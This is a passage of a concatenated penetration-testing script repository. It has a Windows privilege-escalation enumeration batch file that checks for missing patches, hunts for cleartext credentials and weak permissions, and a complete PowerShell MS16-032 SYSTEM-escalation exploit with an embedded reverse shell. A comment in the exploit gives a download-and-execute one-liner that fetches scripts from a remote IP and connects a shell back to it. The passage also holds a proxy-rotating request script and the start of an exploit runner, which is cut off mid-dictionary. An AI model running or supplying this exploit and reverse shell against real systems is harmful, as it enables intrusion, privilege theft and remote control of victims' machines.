340 | 341 | ) 342 | 343 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" | find /i "KB842526" 1>NUL 344 | IF not errorlevel 1 ( 345 | 346 | echo MS04-019 patch is installed :( 347 | 348 | ) ELSE ( 349 | 350 | echo MS04-019 patch is NOT installed! 351 | 352 | ) 353 | 354 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" | find /i "KB835732" 1>NUL 355 | IF not errorlevel 1 ( 356 | 357 | echo MS04-011 patch is installed :( 358 | 359 | ) ELSE ( 360 | 361 | echo MS04-011 patch is NOT installed! 362 | 363 | ) 364 | 365 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" | find /i "KB841872" 1>NUL 366 | IF not errorlevel 1 ( 367 | 368 | echo MS04-020 patch is installed :( 369 | 370 | ) ELSE ( 371 | 372 | echo MS04-020 patch is NOT installed! 373 | 374 | ) 375 | 376 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" | find /i "KB2975684" 1>NUL 377 | IF not errorlevel 1 ( 378 | 379 | echo MS14-040 patch is installed :( 380 | 381 | ) ELSE ( 382 | 383 | echo MS14-040 patch is NOT installed! 384 | 385 | ) 386 | 387 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" | find /i "KB3136041" 1>NUL 388 | IF not errorlevel 1 ( 389 | 390 | echo MS16-016 patch is installed :( 391 | 392 | ) ELSE ( 393 | 394 | echo MS16-016 patch is NOT installed! 395 | 396 | ) 397 | 398 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" | find /i "KB3057191" 1>NUL 399 | IF not errorlevel 1 ( 400 | 401 | echo MS15-051 patch is installed :( 402 | 403 | ) ELSE ( 404 | 405 | echo MS15-051 patch is NOT installed! 406 | 407 | ) 408 | 409 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" | find /i "KB2989935" 1>NUL 410 | IF not errorlevel 1 ( 411 | 412 | echo MS14-070 patch is installed :( 413 | 414 | ) ELSE ( 415 | 416 | echo MS14-070 patch is NOT installed! 
417 | 418 | ) 419 | 420 | 421 | 422 | @echo on 423 | 424 | rem #-------------------------# 425 | rem # File Transfer Utilities # 426 | rem #-------------------------# 427 | 428 | @echo off 429 | 430 | cscript /? 431 | powershell.exe /? 432 | tftp /? 433 | 434 | @echo on 435 | 436 | rem #-----------------------------# 437 | rem # Clear-text/base64 Passwords # 438 | rem #-----------------------------# 439 | 440 | @echo off 441 | 442 | type c:\sysprep.inf 443 | type c:\sysprep\sysprep.xml 444 | type %WINDIR%\Panther\Unattend\Unattended.xml 445 | type %WINDIR%\Panther\Unattended.xml 446 | dir /s *pass* 447 | dir /s *cred* 448 | dir /s *vnc* 449 | dir /s *.config 450 | 451 | @echo on 452 | 453 | rem #----------------------------------# 454 | rem # *.MSI Install - SYSTEM privilege # 455 | rem #----------------------------------# 456 | 457 | @echo off 458 | 459 | rem This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1. 460 | rem This setting will allow low privilege user to install any .MSI as system! 461 | 462 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 463 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 464 | 465 | @echo on 466 | 467 | rem #------------------------# 468 | rem # Unquoted Service Paths # 469 | rem #------------------------# 470 | 471 | @echo off 472 | 473 | wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 474 | 475 | rem All commands from this point onward will require accesschk.exe 476 | rem Make sure you have accesschk.exe(old version) in same directory when you run the script! 477 | 478 | @echo on 479 | 480 | rem #---------------------# 481 | rem # Vulnerable Services # 482 | rem #---------------------# 483 | 484 | @echo off 485 | 486 | rem By default WinXP SP1 grant "Authenticated Users" SERVICE_ALL_ACCESS to "SSDPSRV" and "upnphost"! 
487 | 488 | accesschk.exe /accepteula -uwcqv "Authenticated Users" * 489 | accesschk.exe /accepteula -uwcqv "Power Users" * 490 | accesschk.exe /accepteula -uwcqv "Users" * 491 | 492 | @echo on 493 | 494 | rem #-------------------------------# 495 | rem # Vulnerable Folder Permissions # 496 | rem #-------------------------------# 497 | 498 | @echo off 499 | 500 | accesschk.exe /accepteula -uwdqs "Users" c:\ 501 | accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\ 502 | 503 | @echo on 504 | 505 | rem #-----------------------------# 506 | rem # Vulnerable File Permissions # 507 | rem #-----------------------------# 508 | 509 | @echo off 510 | 511 | accesschk.exe /accepteula -uwqs "Users" c:\*.* 512 | accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.* 513 | 514 | @echo on 515 | 516 | rem #----------------# 517 | rem # Happy Hunting! # 518 | rem #----------------# 519 | 520 | @echo off 521 | -------------------------------------------------------------------------------- /PrivilegeEscalation/Windows/ms16_032_intrd_mod.ps1: -------------------------------------------------------------------------------- 1 | ## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv 2 | 3 | # Follow this cmd to exploit MS16-032 to get admin and run shell.ps1(ATTACHMNT): Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOURCOMANDHERE" 4 | # To get a reverse powershell, serve this ms16_032_intrd_mod.ps1 and Invoke-PowerShellTcp.ps1, and use this download & exec oneliner: IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003" 5 | 6 | function Invoke-MS16-032 { 7 | <# 8 | .SYNOPSIS 9 | 10 | PowerShell implementation of MS16-032. 
The exploit targets all vulnerable 11 | operating systems that support PowerShell v2+. Credit for the discovery of 12 | the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script. 13 | Modifications by Mike Benich (@benichmt1). 14 | 15 | Targets: 16 | 17 | * Win7-Win10 & 2k8-2k12 <== 32/64 bit! 18 | * Tested on x32 Win7, x64 Win8, x64 2k12R2 19 | 20 | Notes: 21 | 22 | * In order for the race condition to succeed the machine must have 2+ CPU 23 | cores. If testing in a VM just make sure to add a core if needed mkay. 24 | * The exploit is pretty reliable, however ~1/6 times it will say it succeeded 25 | but not spawn a shell. Not sure what the issue is but just re-run and profit! 26 | * Want to know more about MS16-032 ==> 27 | https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html 28 | .DESCRIPTION 29 | Author: Ruben Boonen (@FuzzySec) 30 | Blog: http://www.fuzzysecurity.com/ 31 | License: BSD 3-Clause 32 | Required Dependencies: PowerShell v2+ 33 | Optional Dependencies: None 34 | Empire Updates - Mike Benich / @benichmt1 35 | 36 | .EXAMPLE 37 | C:\PS> Invoke-MS16-032 38 | #> 39 | 40 | param ( 41 | [Parameter(Mandatory = $True)] 42 | [string]$Cmd 43 | 44 | ) 45 | 46 | ## intrd's powershell 47 | function Invoke-PowerShellTcp 48 | { 49 | 50 | [CmdletBinding(DefaultParameterSetName="reverse")] Param( 51 | 52 | [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] 53 | [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] 54 | [String] 55 | $IPAddress, 56 | 57 | [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] 58 | [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] 59 | [Int] 60 | $Port, 61 | 62 | [Parameter(ParameterSetName="reverse")] 63 | [Switch] 64 | $Reverse, 65 | 66 | [Parameter(ParameterSetName="bind")] 67 | [Switch] 68 | $Bind 69 | 70 | ) 71 | 72 | #Connect back if the reverse switch is used. 
73 | if ($Reverse) 74 | { 75 | $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) 76 | } 77 | 78 | #Bind to the provided port if Bind switch is used. 79 | if ($Bind) 80 | { 81 | $listener = [System.Net.Sockets.TcpListener]$Port 82 | $listener.start() 83 | $client = $listener.AcceptTcpClient() 84 | } 85 | 86 | $stream = $client.GetStream() 87 | [byte[]]$bytes = 0..255|%{0} 88 | 89 | #Send back current username and computername 90 | $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") 91 | $stream.Write($sendbytes,0,$sendbytes.Length) 92 | 93 | #Show an interactive PowerShell prompt 94 | $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') 95 | $stream.Write($sendbytes,0,$sendbytes.Length) 96 | 97 | while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) 98 | { 99 | $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding 100 | $data = $EncodedText.GetString($bytes,0, $i) 101 | 102 | #Execute the command on the target. 
103 | $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) 104 | 105 | $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' 106 | $x = ($error[0] | Out-String) 107 | $error.clear() 108 | $sendback2 = $sendback2 + $x 109 | 110 | #Return the results 111 | $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) 112 | $stream.Write($sendbyte,0,$sendbyte.Length) 113 | $stream.Flush() 114 | } 115 | $client.Close() 116 | $listener.Stop() 117 | } 118 | 119 | 120 | 121 | Add-Type -TypeDefinition @" 122 | using System; 123 | using System.Diagnostics; 124 | using System.Runtime.InteropServices; 125 | using System.Security.Principal; 126 | 127 | [StructLayout(LayoutKind.Sequential)] 128 | public struct PROCESS_INFORMATION 129 | { 130 | public IntPtr hProcess; 131 | public IntPtr hThread; 132 | public int dwProcessId; 133 | public int dwThreadId; 134 | } 135 | 136 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)] 137 | public struct STARTUPINFO 138 | { 139 | public Int32 cb; 140 | public string lpReserved; 141 | public string lpDesktop; 142 | public string lpTitle; 143 | public Int32 dwX; 144 | public Int32 dwY; 145 | public Int32 dwXSize; 146 | public Int32 dwYSize; 147 | public Int32 dwXCountChars; 148 | public Int32 dwYCountChars; 149 | public Int32 dwFillAttribute; 150 | public Int32 dwFlags; 151 | public Int16 wShowWindow; 152 | public Int16 cbReserved2; 153 | public IntPtr lpReserved2; 154 | public IntPtr hStdInput; 155 | public IntPtr hStdOutput; 156 | public IntPtr hStdError; 157 | } 158 | 159 | [StructLayout(LayoutKind.Sequential)] 160 | public struct SQOS 161 | { 162 | public int Length; 163 | public int ImpersonationLevel; 164 | public int ContextTrackingMode; 165 | public bool EffectiveOnly; 166 | } 167 | 168 | public static class Advapi32 169 | { 170 | [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] 171 | public static extern bool CreateProcessWithLogonW( 172 | String userName, 173 | String domain, 174 | 
String password, 175 | int logonFlags, 176 | String applicationName, 177 | String commandLine, 178 | int creationFlags, 179 | int environment, 180 | String currentDirectory, 181 | ref STARTUPINFO startupInfo, 182 | out PROCESS_INFORMATION processInformation); 183 | 184 | [DllImport("advapi32.dll", SetLastError=true)] 185 | public static extern bool SetThreadToken( 186 | ref IntPtr Thread, 187 | IntPtr Token); 188 | 189 | [DllImport("advapi32.dll", SetLastError=true)] 190 | public static extern bool OpenThreadToken( 191 | IntPtr ThreadHandle, 192 | int DesiredAccess, 193 | bool OpenAsSelf, 194 | out IntPtr TokenHandle); 195 | 196 | [DllImport("advapi32.dll", SetLastError=true)] 197 | public static extern bool OpenProcessToken( 198 | IntPtr ProcessHandle, 199 | int DesiredAccess, 200 | ref IntPtr TokenHandle); 201 | 202 | [DllImport("advapi32.dll", SetLastError=true)] 203 | public extern static bool DuplicateToken( 204 | IntPtr ExistingTokenHandle, 205 | int SECURITY_IMPERSONATION_LEVEL, 206 | ref IntPtr DuplicateTokenHandle); 207 | } 208 | 209 | public static class Kernel32 210 | { 211 | [DllImport("kernel32.dll")] 212 | public static extern uint GetLastError(); 213 | 214 | [DllImport("kernel32.dll", SetLastError=true)] 215 | public static extern IntPtr GetCurrentProcess(); 216 | 217 | [DllImport("kernel32.dll", SetLastError=true)] 218 | public static extern IntPtr GetCurrentThread(); 219 | 220 | [DllImport("kernel32.dll", SetLastError=true)] 221 | public static extern int GetThreadId(IntPtr hThread); 222 | 223 | [DllImport("kernel32.dll", SetLastError = true)] 224 | public static extern int GetProcessIdOfThread(IntPtr handle); 225 | 226 | [DllImport("kernel32.dll",SetLastError=true)] 227 | public static extern int SuspendThread(IntPtr hThread); 228 | 229 | [DllImport("kernel32.dll",SetLastError=true)] 230 | public static extern int ResumeThread(IntPtr hThread); 231 | 232 | [DllImport("kernel32.dll", SetLastError=true)] 233 | public static extern bool 
TerminateProcess( 234 | IntPtr hProcess, 235 | uint uExitCode); 236 | 237 | [DllImport("kernel32.dll", SetLastError=true)] 238 | public static extern bool CloseHandle(IntPtr hObject); 239 | 240 | [DllImport("kernel32.dll", SetLastError=true)] 241 | public static extern bool DuplicateHandle( 242 | IntPtr hSourceProcessHandle, 243 | IntPtr hSourceHandle, 244 | IntPtr hTargetProcessHandle, 245 | ref IntPtr lpTargetHandle, 246 | int dwDesiredAccess, 247 | bool bInheritHandle, 248 | int dwOptions); 249 | } 250 | 251 | public static class Ntdll 252 | { 253 | [DllImport("ntdll.dll", SetLastError=true)] 254 | public static extern int NtImpersonateThread( 255 | IntPtr ThreadHandle, 256 | IntPtr ThreadToImpersonate, 257 | ref SQOS SecurityQualityOfService); 258 | } 259 | "@ 260 | 261 | function Get-ThreadHandle { 262 | # StartupInfo Struct 263 | $StartupInfo = New-Object STARTUPINFO 264 | $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES 265 | $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread() 266 | $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread() 267 | $StartupInfo.hStdError = [Kernel32]::GetCurrentThread() 268 | $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size 269 | 270 | # ProcessInfo Struct 271 | $ProcessInfo = New-Object PROCESS_INFORMATION 272 | 273 | # CreateProcessWithLogonW --> lpCurrentDirectory 274 | $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName 275 | 276 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 277 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 278 | "user", "domain", "pass", 279 | 0x00000002, "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "$Cmd", 280 | 0x00000004, $null, $GetCurrentPath, 281 | [ref]$StartupInfo, [ref]$ProcessInfo) 282 | 283 | # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS 284 | $lpTargetHandle = [IntPtr]::Zero 285 | $CallResult = [Kernel32]::DuplicateHandle( 286 | $ProcessInfo.hProcess, 0x4, 287 | 
[Kernel32]::GetCurrentProcess(), 288 | [ref]$lpTargetHandle, 0, $false, 289 | 0x00000002) 290 | 291 | # Clean up suspended process 292 | $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) 293 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) 294 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) 295 | 296 | $lpTargetHandle 297 | } 298 | 299 | function Get-SystemToken { 300 | echo "`n[?] Trying thread handle: $Thread" 301 | echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)" 302 | 303 | $CallResult = [Kernel32]::SuspendThread($Thread) 304 | if ($CallResult -ne 0) { 305 | echo "[!] $Thread is a bad thread, moving on.." 306 | Return 307 | } echo "[+] Thread suspended" 308 | 309 | echo "[>] Wiping current impersonation token" 310 | $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero) 311 | if (!$CallResult) { 312 | echo "[!] SetThreadToken failed, moving on.." 313 | $CallResult = [Kernel32]::ResumeThread($Thread) 314 | echo "[+] Thread resumed!" 315 | Return 316 | } 317 | 318 | echo "[>] Building SYSTEM impersonation token" 319 | # SecurityQualityOfService struct 320 | $SQOS = New-Object SQOS 321 | $SQOS.ImpersonationLevel = 2 #SecurityImpersonation 322 | $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS) 323 | # Undocumented API's, I like your style Microsoft ;) 324 | $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos) 325 | if ($CallResult -ne 0) { 326 | echo "[!] NtImpersonateThread failed, moving on.." 327 | $CallResult = [Kernel32]::ResumeThread($Thread) 328 | echo "[+] Thread resumed!" 329 | Return 330 | } 331 | 332 | # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE 333 | $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle) 334 | if (!$CallResult) { 335 | echo "[!] OpenThreadToken failed, moving on.." 
336 | $CallResult = [Kernel32]::ResumeThread($Thread) 337 | echo "[+] Thread resumed!" 338 | Return 339 | } 340 | 341 | echo "[?] Success, open SYSTEM token handle: $SysTokenHandle" 342 | echo "[+] Resuming thread.." 343 | $CallResult = [Kernel32]::ResumeThread($Thread) 344 | } 345 | 346 | # main() <--- ;) 347 | $ms16032 = @" 348 | __ __ ___ ___ ___ ___ ___ ___ 349 | | V | _|_ | | _|___| |_ |_ | 350 | | |_ |_| |_| . |___| | |_ | _| 351 | |_|_|_|___|_____|___| |___|___|___| 352 | 353 | [by b33f -> @FuzzySec] 354 | "@ 355 | 356 | 357 | 358 | 359 | $ms16032 360 | 361 | # Check logical processor count, race condition requires 2+ 362 | echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)" 363 | if ($([System.Environment]::ProcessorCount) -lt 2) { 364 | echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n" 365 | Return 366 | } 367 | 368 | # Create array for Threads & TID's 369 | $ThreadArray = @() 370 | $TidArray = @() 371 | 372 | echo "[>] Duplicating CreateProcessWithLogonW handles.." 373 | # Loop Get-ThreadHandle and collect thread handles with a valid TID 374 | for ($i=0; $i -lt 500; $i++) { 375 | $hThread = Get-ThreadHandle 376 | $hThreadID = [Kernel32]::GetThreadId($hThread) 377 | # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray 378 | if ($TidArray -notcontains $hThreadID) { 379 | $TidArray += $hThreadID 380 | if ($hThread -ne 0) { 381 | $ThreadArray += $hThread # This is what we need! 382 | } 383 | } 384 | } 385 | 386 | if ($($ThreadArray.length) -eq 0) { 387 | echo "[!] No valid thread handles were captured, exiting!`n" 388 | Return 389 | } else { 390 | echo "[?] Done, got $($ThreadArray.length) thread handle(s)!" 391 | echo "`n[?] Thread handle list:" 392 | $ThreadArray 393 | } 394 | 395 | echo "`n[*] Sniffing out privileged impersonation token.." 
396 | foreach ($Thread in $ThreadArray){ 397 | 398 | # Null $SysTokenHandle 399 | $script:SysTokenHandle = [IntPtr]::Zero 400 | 401 | # Get handle to SYSTEM access token 402 | Get-SystemToken 403 | 404 | # If we fail a check in Get-SystemToken, skip loop 405 | if ($SysTokenHandle -eq 0) { 406 | continue 407 | } 408 | 409 | echo "`n[*] Sniffing out SYSTEM shell.." 410 | echo "`n[>] Duplicating SYSTEM token" 411 | $hDuplicateTokenHandle = [IntPtr]::Zero 412 | $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) 413 | 414 | # Simple PS runspace definition 415 | echo "[>] Starting token race" 416 | $Runspace = [runspacefactory]::CreateRunspace() 417 | $StartTokenRace = [powershell]::Create() 418 | $StartTokenRace.runspace = $Runspace 419 | $Runspace.Open() 420 | [void]$StartTokenRace.AddScript({ 421 | Param ($Thread, $hDuplicateTokenHandle) 422 | while ($true) { 423 | $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle) 424 | } 425 | }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle) 426 | $AscObj = $StartTokenRace.BeginInvoke() 427 | 428 | echo "[>] Starting process race" 429 | # Adding a timeout (10 seconds) here to safeguard from edge-cases 430 | $SafeGuard = [diagnostics.stopwatch]::StartNew() 431 | while ($SafeGuard.ElapsedMilliseconds -lt 10000) { 432 | # StartupInfo Struct 433 | $StartupInfo = New-Object STARTUPINFO 434 | $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size 435 | 436 | # ProcessInfo Struct 437 | $ProcessInfo = New-Object PROCESS_INFORMATION 438 | 439 | # CreateProcessWithLogonW --> lpCurrentDirectory 440 | $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName 441 | 442 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 443 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 444 | "user", "domain", "pass", 445 | 0x00000002, "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "$Cmd", 446 | 0x00000004, $null, 
$GetCurrentPath, 447 | [ref]$StartupInfo, [ref]$ProcessInfo) 448 | 449 | $hTokenHandle = [IntPtr]::Zero 450 | $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle) 451 | # If we can't open the process token it's a SYSTEM shell! 452 | if (!$CallResult) { 453 | echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n" 454 | $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread) 455 | $StartTokenRace.Stop() 456 | $SafeGuard.Stop() 457 | Return 458 | } 459 | 460 | # Clean up suspended process 461 | $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) 462 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) 463 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) 464 | } 465 | 466 | # Kill runspace & stopwatch if edge-case 467 | $StartTokenRace.Stop() 468 | $SafeGuard.Stop() 469 | } 470 | } 471 | -------------------------------------------------------------------------------- /Python/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/Python/.DS_Store -------------------------------------------------------------------------------- /Python/auto_get_proxy/run.py: -------------------------------------------------------------------------------- 1 | import random 2 | import requests 3 | 4 | 5 | 6 | def LoadUserAgents(uafile=''): 7 | uas = [] 8 | with open(uafile, 'rb') as uaf: 9 | for ua in uaf.readlines(): 10 | if ua: 11 | uas.append(ua.strip()[1:-1-1]) 12 | random.shuffle(uas) 13 | return uas 14 | 15 | # load the user agents, in random order 16 | #user_agents = LoadUserAgents(uafile="user_agents.txt") 17 | 18 | 19 | 20 | def LoadProxy(proxyfile=''): 21 | proxylist = [] 22 | with open(proxyfile,'rb') as proxyf: 23 | for i in proxyf.readlines(): 24 | if i: 25 | proxylist.append(i.strip().split(' ')[4][:-1]) 26 | #print list(i.strip()) 27 | return 
proxylist 28 | 29 | #LoadProxy('proxies.txt') 30 | 31 | 32 | proxy = {"http": "http://username:p3ssw0rd@10.10.1.10:3128"} 33 | url = 'http://api.openweathermap.org/data/2.5/weather' 34 | params = {} 35 | 36 | # load user agents and set headers 37 | uas = LoadUserAgents(uafile="user_agents.txt") 38 | ua = random.choice(uas) # select a random user agent 39 | 40 | # make the request 41 | #r = requests.get(url, proxies=proxy, params=params, headers=headers) 42 | 43 | import time 44 | 45 | def main(): 46 | proxy_list = LoadProxy('proxies.txt') 47 | for p in proxy_list: 48 | url = '' 49 | proxy = {"http": "http://%s" % str(p.strip()) } 50 | print "proxy:" 51 | print proxy 52 | 53 | headers = { 54 | # "Connection" : "close", # another way to cover tracks 55 | "User-Agent" : ua} 56 | time.sleep(random.randint(0, 30)) 57 | 58 | try: 59 | r = requests.get(url, proxies=proxy, params=params, headers=headers, timeout=2) 60 | print r.text 61 | except : 62 | pass 63 | 64 | 65 | if __name__ == "__main__": 66 | main() 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /Python/bugscan_run.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | Bugscan='https://www.bugscan.net/' 4 | from common import * 5 | import binascii 6 | from decode import Decoder 7 | 8 | from miniCurl import Curl 9 | curl = Curl() 10 | import util 11 | from functools import partial 12 | from fingerprint import FingerPrint 13 | import hackhttp 14 | hackhttp=hackhttp.hackhttp() 15 | fingerprint=FingerPrint() 16 | 17 | import sys 18 | import util 19 | 20 | EXP_DIR = '/home/leo/Desktop/bugscan0727/exp' 21 | def get_decode(filename): 22 | #dekey_dic = {'expback_2078pyc_dis.py': '28221b5847a673c1d138bec680e5aab1421a9eed705aca4c316159fd2291b910', 'expback_12pyc_dis.py': 'c3ff499db0ad225bc0cbd0f9cbd7910edaa8861a1f3ebe4cc7b168d1bdad3254', 'expback_189pyc_dis.py': 
'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_77pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_72pyc_dis.py': '8c97d8c12ebb049684db59720d39ad8b38b0081d8cc8d022bd7768ab0bc7c699', 'expback_24pyc_dis.py': 'a27d8237a5f282cdeae742d17cd4e2ca40a686f9debe7307d414394cf8eb469a', 'expback_88pyc_dis.py': 'e77e60afe46271e855a1aaf4738acb8d2712649d7a0e38ee6de5e3cb6e102b19', 'expback_2065pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'exp4.py': '253f4221df8307dfb23c39726a022382162a520739738590c39520b032c15c30', 'expback_38pyc_dis.py': '8505495a868258d1a09f88cf12b87431531bedca34a3dafc03ab58d741c0bbd7', 'expback_1756pyc_dis.py': 'ab5d21d688e5789a47b617d47dc68e48a51243b1b93d3beaf737e411310753fe', 'exp104.py': '145f01b740b46451cc03bbae9d56fe31e385aa681381a9f4ce445f7997baeff5', 'expback_76pyc_dis.py': '0d98a92bbfd99bbfbcf9419d686661ac36d55d2a7ecc0c19768b0d7b0bd9191d', 'expback_18pyc_dis.py': '38ad0c291a56f74acaee1019f24f188a7ddbb6cc51d7e4c29fa993b568404fd1', 'expback_70pyc_dis.py': 'efb1fdfd9905e92bacd3a5367c4727dc7ae722ab7f214e1434b6e25041d34190', 'expback_8pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_6pyc_dis.py': '1d2d57097a9f25403de685038570b272b68e61ec0ad821f5db4ce2e380ba4f4e', 'expback_33pyc_dis.py': '48a2a41fd1a72f6feb52c058c767b31726ef9480f5624b9733cf8088e26475b6', 'expback_26pyc_dis.py': 'a27d8237a5f282cdeae742d17cd4e2ca40a686f9debe7307d414394cf8eb469a', 'expback_28pyc_dis.py': 'c3ff499db0ad225bc0cbd0f9cbd7910edaa8861a1f3ebe4cc7b168d1bdad3254', 'expback_1994pyc_dis.py': 'ffcc396606397e831f857f22b90d87ca05dd77452e7c2760df0f39d9d3f664cb', 'expback_22pyc_dis.py': '3f9632f701953df91e7b13b428d18ab7a549520831cc2a46984c83e81b933673', 'expback_23pyc_dis.py': 'e0a46b005bc3e4b63bf33f9097023d87614810c0b71a355e0934a7bc8a862f32', 'expback_1766pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 
'expback_1070pyc_dis.py': '24000815b2f04e2f070d02f649539c6c6330a1bc45ad798962466966b7a220a4', 'expback_83pyc_dis.py': 'dd9108e2cb4dce78981dc247e24bd0df5c4b004058ebf271788a8e792d85a026', 'expback_100pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_2112pyc_dis.py': 'ac03b075a298860de07a3b68886ffff1dd2cec245ee4a7ea7c3e677dd9cf9cb0', 'expback_29pyc_dis.py': '24000815b2f04e2f070d02f649539c6c6330a1bc45ad798962466966b7a220a4', 'expback_89pyc_dis.py': '0d4af56f54b549460eae50cb9dc579022c7e046e050fbc72242da5f616e21867', 'expback_57pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_63pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_64pyc_dis.py': 'ef632082c7620cf54876da74a1660bfb9c06eb94549b5f3bca646474000d0c46', 'expback_811pyc_dis.py': 'f8feb1e2013b989686230a93b8a543f2db83f2cc6b4dbc40f8b30bdf5e0dfeb9', 'expback_54pyc_dis.py': '4903f9969575cdef55f7b2ed2a12f89b97664e7fb5eb0898e6fd4f6775f166f3', 'expback_34pyc_dis.py': 'd289da3e7b9c736756e3429c23db20228f8e3547d3a4b540da1f86aaf22ff02f', 'expback_2083pyc_dis.py': '345095a6a09c0643bcf41007fd1311cdf4889004e886b2bca8d4881fb27a7fca', 'expback_15pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_1055pyc_dis.py': '7b650aed66397b6e1ba67dfdd39c9626c4c9fec89eebf397a76caa9d0ce45d26', 'expback_60pyc_dis.py': 'a13b6776facce2ce24b9407fe76b7d9a2ac9f97fd11b4c03da49c5dc1bfdd4ed', 'expback_65pyc_dis.py': '24000815b2f04e2f070d02f649539c6c6330a1bc45ad798962466966b7a220a4', 'expback_59pyc_dis.py': 